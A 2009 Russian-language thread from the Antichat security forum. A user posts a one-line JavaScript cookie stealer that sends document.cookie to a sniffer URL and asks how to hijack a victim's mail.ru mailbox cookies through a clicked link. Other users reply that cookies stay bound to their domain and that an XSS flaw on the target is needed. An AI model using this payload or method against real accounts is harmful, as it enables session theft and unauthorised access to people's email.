ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Кража куки через клик по ссылке
  #1  
Старый 04.05.2009, 21:25
LemoTTT
Познающий
Регистрация: 29.04.2009
Сообщений: 56
Провел на форуме:
210520

Репутация: 6
Smile Кража куки через клик по ссылке

если я на бесплатном хосте сделаю хтмл страницу с скриптом, который тырит куки
Код HTML:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
и жертва откроет по ссылке ету страницу, то у меня будут куки или нет?
ЗЫ: пишем те, кто уже точно знает!
 
Ответить с цитированием

  #2  
Старый 04.05.2009, 21:27
fl00der
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131

Репутация: 74
По умолчанию

В общем случае куки можно получить только в рамках одного домена.
 
Ответить с цитированием

  #3  
Старый 04.05.2009, 21:38
LemoTTT
Познающий
Регистрация: 29.04.2009
Сообщений: 56
Провел на форуме:
210520

Репутация: 6
Smile

смотри, я послал жертве на мейл.ру она открыла ссылку етой странице, у меня буду ее куки от почтового ящика?!
 
Ответить с цитированием

  #4  
Старый 04.05.2009, 21:44
pento
Участник форума
Регистрация: 03.07.2006
Сообщений: 147
Провел на форуме:
438137

Репутация: 66
По умолчанию

не будут
 
Ответить с цитированием

  #5  
Старый 04.05.2009, 21:46
LemoTTT
Познающий
Регистрация: 29.04.2009
Сообщений: 56
Провел на форуме:
210520

Репутация: 6
Smile

так как же можно получить куки, если жертва киликает по ссылки, как? какой скрипт, уже много статей почитал инфы 0!искать xss ето не к етой теме!
 
Ответить с цитированием

  #6  
Старый 04.05.2009, 21:59
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Ты, видимо, не понимаешь, что куки без xss не своруешь.
 
Ответить с цитированием

  #7  
Старый 04.05.2009, 22:02
LemoTTT
Познающий
Регистрация: 29.04.2009
Сообщений: 56
Провел на форуме:
210520

Репутация: 6
Smile

та бред ети xss, если меня интересует определенное мыло, и xss на нем нету, как кто то же можно угнать куки!!!!!!!
ЗЫ брут бредддддддд!
 
Ответить с цитированием

  #8  
Старый 04.05.2009, 22:28
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

Бред говоришь ты.
У тебя есть колеса - этот скрипт. Но нет двигателя XSS
Как ты без двигателя толкнешь колеса?
Да никак.
Xss и используется, чтобы сookie своровать.
 
Ответить с цитированием

  #9  
Старый 04.05.2009, 22:40
LemoTTT
Познающий
Регистрация: 29.04.2009
Сообщений: 56
Провел на форуме:
210520

Репутация: 6
Smile

ну вот например в3ять мейл ру, именно почту, а не другие ресурсы, наврядли там есть xss
Зы: 1. пасивная xss что нам дает, с ней моно гнать куки
2. и вообще пасивніе же xss должні прибивать, коль о них много народу знает!
 
Ответить с цитированием

  #10  
Старый 04.05.2009, 22:41
LemoTTT
Познающий
Регистрация: 29.04.2009
Сообщений: 56
Провел на форуме:
210520

Репутация: 6
Smile

ну вот например в3ять мейл ру, именно почту, а не другие ресурсы, наврядли там есть xss
Зы: 1. пасивная xss что нам дает, с ней моно гнать куки
2. и вообще пасивніе же xss должны прибивать, коль о них много народу знает!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Active Perl через проксю Elekt Анонимность 7 10.03.2008 22:14
через xss куки на снифер LeopardSS E-Mail 1 20.01.2006 21:18
Взлом через cookie k00p3r Чужие Статьи 0 13.06.2005 13:56
SQL-injection и не только, через cookies k00p3r Чужие Статьи 0 12.06.2005 12:46
Получение шела через Cgi приложения k00p3r Чужие Статьи 0 08.06.2005 15:04



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ